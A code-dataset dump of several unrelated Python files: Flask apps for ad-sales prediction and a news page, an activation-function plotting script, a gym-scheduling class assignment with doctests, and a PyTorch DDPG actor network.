            response = requests.get(url)
            response.raise_for_status()
            jsonResponse = response.json()
            for e in jsonResponse['events']:
                processEvent(e, statusDict)
            if not jsonResponse['hasMore']:
                break
            offset = jsonResponse['offset']
        print("")
        print("- All events read from API. Saving CSV with each Contact email,status for this campaign")
        print("")
        # Context manager guarantees the CSV is closed even if a contact
        # lookup raises (the original left the handle open in that case).
        with open('contactsCampaign.csv', 'w') as file_object:
            for email in statusDict:
                contact = getContact(email, apikey)
                line = (email + "," + contact['phone'] + "," + contact['name']
                        + "," + contact['lastname'] + "," + statusDict[email])
                print(line)
                file_object.write(line + "\n")
    except HTTPError as http_err:
        print(f'HTTP error occurred: {http_err}')
    except Exception as err:
        print(f'Other error occurred: {err}')
if __name__ == '__main__':
    # Interactive entry point: prompts for API key and campaign id.
    main()
| zlibert/plib-emailcampaign | main.py | main.py | py | 5,094 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "requests.exceptions.HTTPError",
"line_number": 28,
"usage_type": "name"
},
{
"api_name": "requests.get",
"line_number": 85,
"usage_type": "call"
},
{
"api_name": "requests.get"... |
35748710144 | from flask import Flask, request
import sqlite3
import pickle
import numpy as np
app = Flask(__name__)
# Flask only recognises the upper-case "DEBUG" configuration key; the
# original "Debug" key was silently ignored, so debug mode never turned on.
app.config["DEBUG"] = True
@app.route("/", methods=["GET"])
def entrada():
    """Landing page: greet the visitor."""
    return "¡Bienvenido a la página web de Antonio!"
@app.route("/predict", methods=['GET'])
def prediction():
    """Predict sales from the "tv", "radio" and "newspaper" query
    parameters using the pickled regression model.
    """
    tv = request.args.get("tv", None)
    radio = request.args.get("radio", None)
    newspaper = request.args.get("newspaper", None)
    with open("advertising_model", "rb") as f:
        modelo = pickle.load(f)
    # Query-string values arrive as strings; the model expects numbers, so
    # cast explicitly (the original passed raw strings to predict()).
    prediccion = modelo.predict([[float(tv), float(radio), float(newspaper)]])
    return str(prediccion)
@app.route("/ingest_data", methods=['GET'])
def agregar():
    """Insert one observation (tv, radio, newspaper, sales) into the
    Advertising table and report the new row count.
    """
    tv = request.args.get("tv", None)
    radio = request.args.get("radio", None)
    newspaper = request.args.get("newspaper", None)
    sales = request.args.get("sales", None)
    connection = sqlite3.connect("Advertising.db")
    cursor = connection.cursor()
    # Parameterized query: the original interpolated raw request values
    # straight into the SQL string, allowing SQL injection.
    cursor.execute(
        "INSERT INTO Advertising(tv, radio, newspaper, sales) VALUES(?, ?, ?, ?)",
        (tv, radio, newspaper, sales))
    # COUNT(*) instead of fetching every row just to count the result.
    num = str(cursor.execute("select count(*) from advertising").fetchone()[0])
    connection.commit()
    connection.close()
    return str("el número de registros de la base de datos ahora es: " + num)
@app.route("/retrain", methods=['GET'])
def reentrenar():
    """Re-fit the pickled model on all rows in the database and persist it
    back to disk.
    """
    connection = sqlite3.connect("Advertising.db")
    cursor = connection.cursor()
    with open("advertising_model", "rb") as f:
        modelo = pickle.load(f)
    # Fetch the table once (the original ran the identical query twice).
    data = np.array(cursor.execute("select * from advertising").fetchall())
    x = data[:, :-1]
    y = data[:, 3]
    modelo.fit(x, y)
    # Persist the re-trained model; without this the fit was discarded as
    # soon as the request finished, despite the success message.
    with open("advertising_model", "wb") as f:
        pickle.dump(modelo, f)
    connection.close()
    return "El modelo ha sido reentrenado con los valores añadidos"
| Toni2Morales/EjerPyAnywhere | pagina.py | pagina.py | py | 1,757 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "flask.request.args.get",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "flask.request.args",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "flask.reque... |
23100209026 | """Contains example scripts presenting various activation functions characteristics."""
import os
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
import numpy as np
import inspect
from typing import Dict, Type
import NaiveNeurals.MLP.activation_functions as functions_module
def plot_characteristics():
    """Plot every ActivationFunction subclass on one axis and save the
    figure to docs/graphs/activation_functions.png.
    """
    # Collect every activation class exported by the module, keyed by its
    # short label; the abstract base class itself is excluded.
    activations: Dict[str, Type[functions_module.ActivationFunction]] = {
        member.label: member
        for _, member in inspect.getmembers(functions_module)
        if inspect.isclass(member)
        and issubclass(member, functions_module.ActivationFunction)
        and member is not functions_module.ActivationFunction
    }
    # One (line style, legend colour) pair is consumed per function.
    line_styles = ['m-', 'k-', 'r--', 'b-', 'c-']
    swatches = ['magenta', 'black', 'red', 'blue', 'cyan']
    figure = plt.figure()
    axis = figure.add_subplot(111)
    patches = []
    for label, activation in activations.items():
        # Narrower domains keep the linear and softplus curves readable.
        if label == 'lin':
            domain = np.linspace(-1, 1, 21)
        elif label == 'softplus':
            domain = np.linspace(-2, 2, 21)
        else:
            domain = np.linspace(-4, 4, 101)
        patches.append(mpatches.Patch(color=swatches.pop(), label=label))
        axis.plot(domain, activation.function(domain), line_styles.pop())
    plt.legend(handles=patches)
    plt.savefig(os.path.abspath(os.path.dirname(__file__)) + '/../docs/graphs/activation_functions.png')
    plt.show()
if __name__ == '__main__':
    # Render and save the comparison plot when run as a script.
    plot_characteristics()
| p-sto/NaiveNeurals | scripts/activation_functions_example.py | activation_functions_example.py | py | 1,562 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "typing.Dict",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "typing.Type",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "NaiveNeurals.MLP.activation_functions.ActivationFunction",
"line_number": 16,
"usage_type": "attribute"
},
{
... |
36569687322 | import datetime
from flask import Flask, render_template, request, json
# WSGI application object for the news site.
application = Flask("News")
def getNews():
    """Render every stored news item from news.json as one HTML string.

    Each item becomes a <div class="content"> with title, date and text.
    NOTE(review): item fields are inserted without HTML escaping — stored
    content is trusted; confirm the editor is not exposed to the public.
    """
    with open("news.json", "r", encoding="UTF-8") as file:
        newsList = json.loads(file.read())
    # Collect fragments and join once instead of quadratic string +=;
    # the explicit file.close() was also redundant inside the with block.
    parts = []
    for news in newsList:
        parts.append('<div class="content">')
        parts.append(f'<h2>{news["title"]}</h2>')
        parts.append(f'<h5>{news["date"]}</h5>')
        parts.append(f'<div>{news["text"]}</div>')
        parts.append('</div>')
    return ''.join(parts)
def addNews(title: str, text: str) -> None:
    """Append a news item with the current timestamp to news.json."""
    currentDate = datetime.datetime.today()
    with open("news.json", "r", encoding="UTF-8") as file:
        newsList = json.loads(file.read())
        newsData = {"title": title, "date": currentDate, "text": text}
        newsList.append(newsData)
        # NOTE(review): "date" is a datetime object; this module imports
        # `json` from flask, and serializing a datetime relies on flask's
        # JSON encoder (the stdlib json would raise TypeError) — confirm.
        with open("news.json", "w", encoding="UTF-8") as file2:
            file2.write(json.dumps(newsList, indent=2))
            # Both close() calls below are redundant: the with blocks
            # already close the files.
            file2.close()
        file.close()
@application.route("/")
def start():
    """Home page: render index.html with the stored news as HTML."""
    return render_template("index.html", content=getNews())
@application.route("/editor")
def editor():
    """News editor page.

    When both "title" and "text" query parameters are supplied, the news
    item is stored before the editor template is rendered.
    """
    if request.method == "GET":
        title = request.args.get("title")
        text = request.args.get("text")
        # Identity comparison with None (`is not None`) instead of `!= None`.
        if title is not None and text is not None:
            addNews(title, text)
    return render_template("editor.html")
# Start the dev server on port 8081. NOTE(review): 0.0.0.0 binds all
# interfaces, exposing the development server to the network — confirm.
application.run(host="0.0.0.0", port=8081)
{
"api_name": "flask.Flask",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "flask.json.loads",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "flask.json",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "datetime.datetime.today",
... |
2940036472 | from __future__ import annotations
from datetime import datetime
from typing import Any
from gym_utilities import in_week, create_offering_dict
# The additional pay per hour that instructors receive for each certificate they
# hold.
BONUS_RATE = 1.50
class WorkoutClass:
    """A workout class that can be offered at a gym.

    === Public Attributes ===
    name: The name of the workout class.

    === Private Attributes ===
    _required_certificates: The certificates that an instructor must hold to
        teach this WorkoutClass.
    """
    name: str
    _required_certificates: list[str]

    def __init__(self, name: str, required_certificates: list[str]) -> None:
        """Initialize a new WorkoutClass called <name> requiring
        <required_certificates>.

        >>> workout_class = WorkoutClass('Kickboxing', ['Strength Training'])
        >>> workout_class.name
        'Kickboxing'
        """
        self.name = name
        # Copy to avoid aliasing the caller's list.
        self._required_certificates = required_certificates[:]

    def get_required_certificates(self) -> list[str]:
        """Return the certificates required to teach this WorkoutClass.

        A copy is returned so the caller cannot mutate the private list.

        >>> WorkoutClass('Kick', ['ST']).get_required_certificates()
        ['ST']
        """
        return self._required_certificates[:]

    def __eq__(self, other: Any) -> bool:
        """Return True iff <other> is a WorkoutClass with the same name and
        required certificates as this one.

        >>> WorkoutClass('K', ['S']) == WorkoutClass('K', ['S'])
        True
        """
        if not isinstance(other, WorkoutClass):
            return False
        return (self.name == other.name
                and self._required_certificates == other._required_certificates)

    def __hash__(self) -> int:
        """Return a hash consistent with __eq__.

        Defining __eq__ alone sets __hash__ to None, which made instances
        unusable as dict keys / set members; this restores hashability.
        """
        return hash((self.name, tuple(self._required_certificates)))
class Instructor:
    """An instructor at a Gym.

    === Public Attributes ===
    name: The name of this instructor.

    === Private Attributes ===
    _id: The id representing this instructor.
    _qualifications: A list of qualifications this instructor holds.
    """
    name: str
    _id: int
    _qualifications: list[str]

    def __init__(self, _id: int, name: str) -> None:
        """Initialize an Instructor with the given <_id> and <name> and an
        empty list of qualifications.
        """
        self.name = name
        self._id = _id
        self._qualifications = []

    def add_certificate(self, q: str) -> bool:
        """Record certificate <q> for this instructor.

        Return True iff <q> was not already held (duplicates are ignored).
        """
        if q in self._qualifications:
            return False
        self._qualifications.append(q)
        return True

    def get_id(self) -> int:
        """Return this instructor's id."""
        return self._id

    def get_certificates(self) -> list[str]:
        """Return a copy of this instructor's qualifications, so the
        private list cannot be mutated by the caller.
        """
        return list(self._qualifications)
class Gym:
"""A gym that hosts workout classes taught by instructors.
All offerings of workout classes start on the hour and are 1 hour long.
If a class starts at 7:00 pm, for example, we say that the class is "at"
the timepoint 7:00, or just at 7:00.
=== Public Attributes ===
name: The name of the gym.
=== Private Attributes ===
_instructors: The instructors who work at this Gym.
Each key is an instructor's ID and its value is the Instructor object
representing them.
_workouts: The workout classes that are taught at this Gym.
Each key is the name of a workout class and its value is the
WorkoutClass object representing it.
_room_capacities: The rooms and capacities in this Gym.
Each key is the name of a room and its value is the room's capacity,
that is, the number of people who can register for a class in the room.
_schedule: The schedule of classes offered at this gym.
Each key is a date and time and its value is a nested dictionary
describing all offerings that start then. In the nested dictionary,
each key is the name of a room that has an offering scheduled then,
and its value is a tuple describing the offering. The tuple elements
record, in order:
- the instructor teaching the class,
- the workout class itself, and
- a list of registered clients. Each client is represented in the
list by a unique string.
=== Representation Invariants ===
- All instructors in _schedule are in _instructors (the reverse is not
necessarily true).
- All workout classes in _schedule are in _workouts (the reverse is not
necessarily true).
- All rooms recorded in _schedule are also recorded in _room_capacities (the
reverse is not necessarily true).
- Two workout classes cannot be scheduled at the same time in the same room.
- No instructor is scheduled to teach two workout classes at the same time.
I.e., there does not exist timepoint t, and rooms r1 and r2 such that
_schedule[t][r1][0] == _schedule[t][r2][0]
- No client can take two workout classes at the same time.
I.e., there does not exist timepoint t, and rooms r1 and r2 such that
c in _schedule[t][r1][2] and c in _schedule[t][r2][2]
- If an instructor is scheduled to teach a workout class, they have the
necessary qualifications.
- If there are no offerings scheduled at date and time <d>, then <d>
does not occur as a key in _schedule.
- If there are no offerings scheduled at date and time <d> in room <r> then
<r> does not occur as a key in _schedule[d]
- Each list of registered clients for an offering is ordered with the most
recently registered client at the end of the list.
"""
name: str
_instructors: dict[int, Instructor]
_workouts: dict[str, WorkoutClass]
_room_capacities: dict[str, int]
_schedule: dict[datetime,
dict[str, tuple[Instructor, WorkoutClass, list[str]]]]
    def __init__(self, gym_name: str) -> None:
        """Initialize a new Gym with <name>. Initially, this gym has no
        instructors, workout classes, rooms, or offerings.

        >>> ac = Gym('Athletic Centre')
        >>> ac.name
        'Athletic Centre'
        """
        self.name = gym_name
        # All collections start empty; they are populated via the add_*
        # and schedule_* methods.
        self._instructors = {}
        self._workouts = {}
        self._room_capacities = {}
        self._schedule = {}
def add_instructor(self, instructor: Instructor) -> bool:
"""Add a new <instructor> to this Gym's roster iff the <instructor> does
not have the same id as another instructor at this Gym.
Return True iff the id has not already been added to this Gym's roster.
>>> ac = Gym('Athletic Centre')
>>> diane = Instructor(1, 'Diane')
>>> ac.add_instructor(diane)
True
"""
for _id in self._instructors:
if instructor.get_id() == _id:
return False
self._instructors[instructor.get_id()] = instructor
return True
def add_workout_class(self, workout_class: WorkoutClass) -> bool:
"""Add a <workout_class> to this Gym iff the <workout_class> does not
have the same name as another WorkoutClass at this Gym.
Return True iff the workout class has not already been added this Gym.
>>> ac = Gym('Athletic Centre')
>>> kickboxing = WorkoutClass('Kickboxing', ['Strength Training'])
>>> ac.add_workout_class(kickboxing)
True
"""
for workout_name in self._workouts:
if workout_class.name == workout_name:
return False
self._workouts[workout_class.name] = workout_class
return True
def add_room(self, name: str, capacity: int) -> bool:
"""Add a room with <name> and <capacity> to this Gym iff there is not
already a room with <name> at this Gym.
Return True iff the room has not already been added to this Gym.
>>> ac = Gym('Athletic Centre')
>>> ac.add_room('Dance Studio', 50)
True
"""
for room_name in self._room_capacities:
if name == room_name:
return False
self._room_capacities[name] = capacity
return True
def schedule_workout_class(self, time_point: datetime, room_name: str,
workout_name: str, instr_id: int) -> bool:
"""Add an offering to this Gym at <time_point> iff: the room with
<room_name> is available, the instructor with <instr_id> is qualified
to teach the workout class with <workout_name>, and the instructor is
not teaching another workout class at the same <time_point>.
A room is available iff it does not already have another workout class
scheduled at that day and time.
The added offering starts with no registered clients.
Return True iff the offering was added.
Preconditions:
- The room has already been added to this Gym.
- The Instructor has already been added to this Gym.
- The WorkoutClass has already been added to this Gym.
>>> ac = Gym('Athletic Centre')
>>> jacqueline = Instructor(1, 'Jacqueline Smith')
>>> ac.add_instructor(jacqueline)
True
>>> jacqueline.add_certificate('Cardio 1')
True
>>> diane = Instructor(2, 'Diane Horton')
>>> ac.add_instructor(diane)
True
>>> ac.add_room('Dance Studio', 18)
True
>>> ac.add_room('lower gym', 50)
True
>>> boot_camp = WorkoutClass('Boot Camp', ['Cardio 1'])
>>> ac.add_workout_class(boot_camp)
True
>>> tap = WorkoutClass('Intro Tap', [])
>>> ac.add_workout_class(tap)
True
>>> sep_9_2022_12_00 = datetime(2022, 9, 9, 12, 0)
>>> ac.schedule_workout_class(sep_9_2022_12_00, 'lower gym',\
boot_camp.name, jacqueline.get_id())
True
>>> ac.schedule_workout_class(sep_9_2022_12_00, 'Dance Studio',\
tap.name, diane.get_id())
True
"""
if time_point in self._schedule:
for _class in self._schedule[time_point]:
if self._schedule[time_point][_class][0].get_id() == instr_id:
return False
for q in self._workouts[workout_name].get_required_certificates():
if q not in self._instructors[instr_id].get_certificates():
return False
if time_point in self._schedule:
for room in self._schedule[time_point]:
if room_name == room:
return False
if self._schedule.get(time_point) is None:
self._schedule[time_point] \
= {room_name: (self._instructors[instr_id],
self._workouts[workout_name],
[])}
return True
self._schedule[time_point][room_name] \
= (self._instructors[instr_id], self._workouts[workout_name], [])
return True
def register(self, time_point: datetime, client: str, workout_name: str) \
-> bool:
"""Add <client> to the WorkoutClass with <workout_name> that is being
offered at <time_point> iff the client has not already been registered
in any course (including <workout_name>) at <time_point>, and the room
is not full.
If the WorkoutClass is being offered in more than one room at
<time_point>, then add the client to the room that has the most clients
already registered but still has available space. In the case of a tie,
register <client> in any of the tied classes.
Return True iff the client was added.
Precondition: the WorkoutClass with <workout_name> is being offered in
at least one room at <time_point>.
>>> ac = Gym('Athletic Centre')
>>> diane = Instructor(1, 'Diane')
>>> diane.add_certificate('Cardio 1')
True
>>> ac.add_instructor(diane)
True
>>> ac.add_room('Dance Studio', 50)
True
>>> boot_camp = WorkoutClass('Boot Camp', ['Cardio 1'])
>>> ac.add_workout_class(boot_camp)
True
>>> sep_9_2022_12_00 = datetime(2022, 9, 9, 12, 0)
>>> ac.schedule_workout_class(sep_9_2022_12_00, 'Dance Studio',\
boot_camp.name, diane.get_id())
True
>>> ac.register(sep_9_2022_12_00, 'Philip', 'Boot Camp')
True
>>> ac.register(sep_9_2022_12_00, 'Philip', 'Boot Camp')
False
"""
if time_point not in self._schedule:
return False
for _class in self._schedule[time_point]:
if client in self._schedule[time_point][_class][2]:
return False
listy = []
for room_name in self._schedule[time_point]:
if self._schedule[time_point][room_name][1].name == workout_name:
listy.append((self._room_capacities[room_name]
- len(self._schedule[time_point][room_name][2]),
room_name))
listy.sort()
listy.reverse()
for item in listy:
if item[0] != 0:
self._schedule[time_point][item[1]][2].append(client)
return True
return False
def instructor_hours(self, time1: datetime, time2: datetime) -> \
dict[int, int]:
"""Return a dictionary reporting the hours worked by instructors
teaching classes that start at any time between <time1> and <time2>,
inclusive.
Each key is an instructor ID and its value is the total number of hours
worked by that instructor between <time1> and <time2>. Both <time1> and
<time2> specify the start time for an hour when an instructor may have
taught.
Precondition: time1 <= time2
>>> ac = Gym('Athletic Centre')
>>> diane = Instructor(1, 'Diane')
>>> david = Instructor(2, 'David')
>>> diane.add_certificate('Cardio 1')
True
>>> ac.add_instructor(diane)
True
>>> ac.add_instructor(david)
True
>>> ac.add_room('Dance Studio', 50)
True
>>> boot_camp = WorkoutClass('Boot Camp', ['Cardio 1'])
>>> ac.add_workout_class(boot_camp)
True
>>> t1 = datetime(2019, 9, 9, 12, 0)
>>> ac.schedule_workout_class(t1, 'Dance Studio', boot_camp.name, 1)
True
>>> t2 = datetime(2019, 9, 10, 12, 0)
>>> ac.instructor_hours(t1, t2) == {1: 1, 2: 0}
True
>>> ac.schedule_workout_class(t2, 'Dance Studio', boot_camp.name, 1)
True
>>> ac.instructor_hours(t1, t2) == {1: 2, 2: 0}
True
"""
hours_dict = {}
for _id in self._instructors:
hours_dict[self._instructors[_id].get_id()] = 0
if not self._schedule:
return hours_dict
for time in self._schedule:
if time1 <= time <= time2:
for room_name in self._schedule[time]:
ins_id = self._schedule[time][room_name][0].get_id()
hours_dict[ins_id] += 1
return hours_dict
def payroll(self, time1: datetime, time2: datetime, base_rate: float) \
-> list[tuple[int, str, int, float]]:
"""Return a sorted list of tuples reporting pay earned by each
instructor teaching classes that start any time between <time1> and
<time2>, inclusive. The list should be sorted in ascending order of
instructor ids.
Each tuple contains 4 elements, in this order:
- an instructor's ID,
- the instructor's name,
- the number of hours worked by the instructor between <time1> and
<time2>, and
- the instructor's total wages earned between <time1> and <time2>.
The returned list is sorted by instructor ID.
Both <time1> and <time2> specify the start time for an hour when an
instructor may have taught.
Each instructor earns a <base_rate> per hour plus an additional
BONUS_RATE per hour for each certificate they hold.
Precondition: time1 <= time2
>>> ac = Gym('Athletic Centre')
>>> diane = Instructor(1, 'Diane')
>>> david = Instructor(2, 'David')
>>> diane.add_certificate('Cardio 1')
True
>>> ac.add_instructor(david)
True
>>> ac.add_instructor(diane)
True
>>> ac.add_room('Dance Studio', 50)
True
>>> boot_camp = WorkoutClass('Boot Camp', ['Cardio 1'])
>>> ac.add_workout_class(boot_camp)
True
>>> t1 = datetime(2019, 9, 9, 12, 0)
>>> ac.schedule_workout_class(t1, 'Dance Studio', boot_camp.name,
... 1)
True
>>> t2 = datetime(2019, 9, 10, 12, 0)
>>> ac.payroll(t1, t2, 25.0)
[(1, 'Diane', 1, 26.5), (2, 'David', 0, 0.0)]
"""
payroll_list = []
if not self._schedule:
return payroll_list
for time in self._schedule:
if time1 <= time <= time2:
for room_name in self._schedule[time]:
ins_id = self._schedule[time][room_name][0].get_id()
hrs = self.instructor_hours(time1, time2)[ins_id]
ins_name = self._schedule[time][room_name][0].name
ins = self._instructors[ins_id]
payroll_list.append((ins_id,
ins_name,
hrs,
(base_rate + len(
ins.get_certificates())
* BONUS_RATE)
* hrs
))
for _id in self._instructors:
temp = True
for item in payroll_list:
if item[0] == _id:
temp = False
if temp:
payroll_list.append((_id, self._instructors[_id].name, 0, 0.0))
payroll_list.sort()
return payroll_list
def _is_instructor_name_unique(self, instructor: Instructor) -> bool:
"""Return True iff the name of <instructor> is used by <= 1 instructor
in the Gym.
>>> ac = Gym('Athletic Centre')
>>> first_hire = Instructor(1, 'Diane')
>>> ac.add_instructor(first_hire)
True
>>> ac._is_instructor_name_unique(first_hire)
True
>>> second_hire = Instructor(2, 'Diane')
>>> ac.add_instructor(second_hire)
True
>>> ac._is_instructor_name_unique(first_hire)
False
>>> ac._is_instructor_name_unique(second_hire)
False
>>> third_hire = Instructor(3, 'Tom')
>>> ac._is_instructor_name_unique(third_hire)
True
"""
count = 0
for _id in self._instructors:
if self._instructors[_id].name == instructor.name:
count += 1
if count <= 1:
return True
return False
def offerings_at(self, time_point: datetime) -> list[dict[str, str | int]]:
"""Return a list of dictionaries, each representing a workout offered
at this Gym at <time_point>.
The offerings should be sorted by room name, in alphabetical ascending
order.
Each dictionary must have the following keys and values:
'Date': the weekday and date of the class as a string, in the format
'Weekday, year-month-day' (e.g., 'Monday, 2022-11-07')
'Time': the time of the class, in the format 'HH:MM' where
HH uses 24-hour time (e.g., '15:00')
'Class': the name of the class
'Room': the name of the room
'Registered': the number of people already registered for the class
'Available': the number of spots still available in the class
'Instructor': the name of the instructor
If there are multiple instructors with the same name, the name
should be followed by the instructor ID in parentheses
e.g., "Diane (1)"
If there are no offerings at <time_point>, return an empty list.
NOTE:
- You MUST use the helper function create_offering_dict from
gym_utilities to create the dictionaries, in order to make sure you
match the format specified above.
- You MUST use the helper method _is_instructor_name_unique when
deciding how to format the instructor name.
>>> ac = Gym('Athletic Centre')
>>> diane1 = Instructor(1, 'Diane')
>>> diane1.add_certificate('Cardio 1')
True
>>> diane2 = Instructor(2, 'Diane')
>>> david = Instructor(3, 'David')
>>> david.add_certificate('Strength Training')
True
>>> ac.add_instructor(diane1)
True
>>> ac.add_instructor(diane2)
True
>>> ac.add_instructor(david)
True
>>> ac.add_room('Dance Studio', 50)
True
>>> ac.add_room('Room A', 20)
True
>>> boot_camp = WorkoutClass('Boot Camp', ['Cardio 1'])
>>> ac.add_workout_class(boot_camp)
True
>>> kickboxing = WorkoutClass('KickBoxing', ['Strength Training'])
>>> ac.add_workout_class(kickboxing)
True
>>> t1 = datetime(2022, 9, 9, 12, 0)
>>> ac.schedule_workout_class(t1, 'Dance Studio', boot_camp.name, 1)
True
>>> ac.schedule_workout_class(t1, 'Room A', kickboxing.name, 3)
True
>>> ac.offerings_at(t1) == [
... { 'Date': 'Friday, 2022-09-09', 'Time': '12:00',
... 'Class': 'Boot Camp', 'Room': 'Dance Studio', 'Registered': 0,
... 'Available': 50, 'Instructor': 'Diane (1)' },
... { 'Date': 'Friday, 2022-09-09', 'Time': '12:00',
... 'Class': 'KickBoxing', 'Room': 'Room A', 'Registered': 0,
... 'Available': 20, 'Instructor': 'David' }
... ]
True
"""
listy = []
if not self._schedule[time_point]:
return []
for room_name in self._schedule[time_point]:
temp = self._schedule[time_point][room_name][0]
if self._is_instructor_name_unique(temp):
ins_name = self._schedule[time_point][room_name][0].name
else:
ins_name = self._schedule[time_point][room_name][0].name + \
f" ({self._schedule[time_point][room_name][0].get_id()})"
listy.append(
create_offering_dict(
time_point.strftime('%A, %Y-%m-%d'),
time_point.strftime('%H:%M'),
self._schedule[time_point][room_name][1].name,
room_name,
len(self._schedule[time_point][room_name][2]),
self._room_capacities[room_name]
- len(self._schedule[time_point][room_name][2]),
ins_name
)
)
listy.sort(key=lambda x: x['Room'])
return listy
def to_schedule_list(self, week: datetime = None) \
-> list[dict[str, str | int]]:
"""Return a list of dictionaries for the Gym's entire schedule, with
each dictionary representing a workout offered (in the format specified
by the docstring for offerings_at).
The dictionaries should be in the list in ascending order by their date
and time (not the string representation of the date and time).
Offerings occurring at exactly the same date and time should
be in alphabetical order based on their room names.
If <week> is specified, only return the events that occur between the
date interval (between a Monday 0:00 and Sunday 23:59) that contains
<week>.
Hint: The helper function <in_week> can be used to determine if one
datetime object is in the same week as another.
>>> ac = Gym('Athletic Centre')
>>> diane1 = Instructor(1, 'Diane')
>>> diane1.add_certificate('Cardio 1')
True
>>> diane2 = Instructor(2, 'Diane')
>>> david = Instructor(3, 'David')
>>> david.add_certificate('Strength Training')
True
>>> ac.add_instructor(diane1)
True
>>> ac.add_instructor(diane2)
True
>>> ac.add_instructor(david)
True
>>> ac.add_room('Studio 1', 20)
True
>>> boot_camp = WorkoutClass('Boot Camp', ['Cardio 1'])
>>> ac.add_workout_class(boot_camp)
True
>>> kickboxing = WorkoutClass('KickBoxing', ['Strength Training'])
>>> ac.add_workout_class(kickboxing)
True
>>> t1 = datetime(2022, 9, 9, 12, 0)
>>> ac.schedule_workout_class(t1, 'Studio 1', boot_camp.name, 1)
True
>>> t2 = datetime(2022, 9, 8, 13, 0)
>>> ac.schedule_workout_class(t2, 'Studio 1', kickboxing.name, 3)
True
>>> ac.to_schedule_list() == [
... { 'Date': 'Thursday, 2022-09-08', 'Time': '13:00',
... 'Class': 'KickBoxing', 'Room': 'Studio 1', 'Registered': 0,
... 'Available': 20, 'Instructor': 'David' },
... { 'Date': 'Friday, 2022-09-09', 'Time': '12:00',
... 'Class': 'Boot Camp', 'Room': 'Studio 1', 'Registered': 0,
... 'Available': 20, 'Instructor': 'Diane (1)' },
... ]
True
"""
listy = []
if not self._schedule:
return listy
schedule_keys = list(self._schedule.keys())
schedule_keys.sort(reverse=False)
if week:
for time in schedule_keys:
if in_week(time, week):
listy = self.__add_o(listy, time)
else:
for time in schedule_keys:
listy = self.__add_o(listy, time)
return listy
def __add_o(self, listy: list[dict[str, str | int]], t: datetime) \
-> list[dict[str, str | int]]:
"""
Helper function for to_schedule_list, appends all offerings at
<time> to <listy>.
"""
if len(self.offerings_at(t)) == 1:
listy.append(self.offerings_at(t)[0])
return listy
for item in self.offerings_at(t):
listy.append(item)
return listy
def __eq__(self, other: Gym) -> bool:
"""Return True iff this Gym is equal to <other>.
Two gyms are considered equal if they have the same name,
instructors, workouts, room capacities, and schedule.
>>> ac = Gym('Athletic Centre')
>>> ac2 = Gym('Athletic Centre')
>>> ac == ac2
True
"""
return self.name == other.name \
and self._instructors == other._instructors \
and self._workouts == other._workouts \
and self._room_capacities == other._room_capacities \
and self._schedule == other._schedule
    def to_webpage(self) -> None:
        """
        Intentional stub — does nothing.

        Deleted this method because I was having an error with pandas on
        my computer. It said I had no module _bz2, I tried to install
        using the command line and pip, and also tried to build
        python again, but it didn't work, so I removed the method entirely,
        along with any other methods that called pandas. The method header
        is still here because there is a test on MarkUs that checks if it is.
        """
# Entry-point guard: this module only defines classes, so nothing runs
# when it is executed directly.
if __name__ == '__main__':
    pass
| Heian0/148 | 148/assignments/a0/a0/gym.py | gym.py | py | 28,439 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "typing.Any",
"line_number": 51,
"usage_type": "name"
},
{
"api_name": "datetime.datetime",
"line_number": 178,
"usage_type": "name"
},
{
"api_name": "datetime.datetime",
"line_number": 248,
"usage_type": "name"
},
{
"api_name": "datetime.datetime",
... |
25444280568 | import torch
import torch.nn as nn
import torch.optim as optim
import os
from omegaconf import OmegaConf, DictConfig
def save_model(model, path=None):
    """Persist a network's weights to disk.

    model -- object exposing `save_path`, `name` and `get_weights()`
             (the Actor/Critic classes below satisfy this).
    path  -- optional checkpoint subdirectory created under
             `model.save_path`; when omitted the weights are written
             directly into `model.save_path`.

    The target directory is created if missing.  Uses
    os.makedirs(..., exist_ok=True), which is race-free compared to the
    original exists()-then-makedirs() pair.
    """
    target_dir = os.path.join(model.save_path, path) if path else model.save_path
    os.makedirs(target_dir, exist_ok=True)
    torch.save(model.get_weights(), os.path.join(target_dir, model.name))
def load_model(model, save_path, checkpoint):
    """Restore a network's weights from <save_path>/<checkpoint>/<model.name>."""
    weights_file = os.path.join(save_path, checkpoint, model.name)
    state = torch.load(weights_file)
    model.load_state_dict(state)
class Actor(nn.Module):
    """Deterministic policy network (actor) for DDPG.

    Maps a state vector to an action vector squashed into [-1, 1] by a
    final Tanh, via two hidden layers (400, 300) with LayerNorm + ReLU.
    """

    def __init__(self, config: DictConfig, target=False, worker=False):
        """
        config -- configuration object with `running_on`, `agent` and
                  `env` sections (see the project's hydra configs).
        target -- when True this instance is the target-network copy.
        worker -- when True the network is pinned to the CPU.
        """
        super().__init__()
        self.config = config
        # Device resolution: CUDA when available, 'mps' on Apple silicon
        # (running_on == 'M1'), and always plain CPU for rollout workers.
        device = 'cuda' if torch.cuda.is_available() else 'cpu'
        if config.running_on == 'M1':
            device = 'mps' if torch.backends.mps.is_available() else 'cpu'
        if worker:
            device = 'cpu'
        self.device = device
        self.name = 'target_actor' if target else 'actor'
        self.save_path = config.agent.save_path
        self.learning_rate = config.agent.actor_lr
        self.state_dimension = config.env.state_dimension
        self.action_dimension = config.env.action_dimension
        self.linear_block = nn.Sequential(
            nn.Linear(self.state_dimension, 400),
            nn.LayerNorm(400),
            nn.ReLU(),
            nn.Linear(400, 300),
            nn.LayerNorm(300),
            nn.ReLU(),
            nn.Linear(300, self.action_dimension),
            nn.Tanh(),
        )
        self.optimizer = optim.Adam(self.parameters(), lr=self.learning_rate)
        self.to(self.device)

    def forward(self, x):
        """Return the (tanh-squashed) action for state batch *x*."""
        return self.linear_block(x)

    def get_weights(self):
        """Return a CPU copy of the state dict (safe to ship between processes)."""
        return {key: tensor.cpu() for key, tensor in self.state_dict().items()}

    def set_weights(self, weights):
        """Load a state dict previously produced by get_weights()."""
        self.load_state_dict(weights)

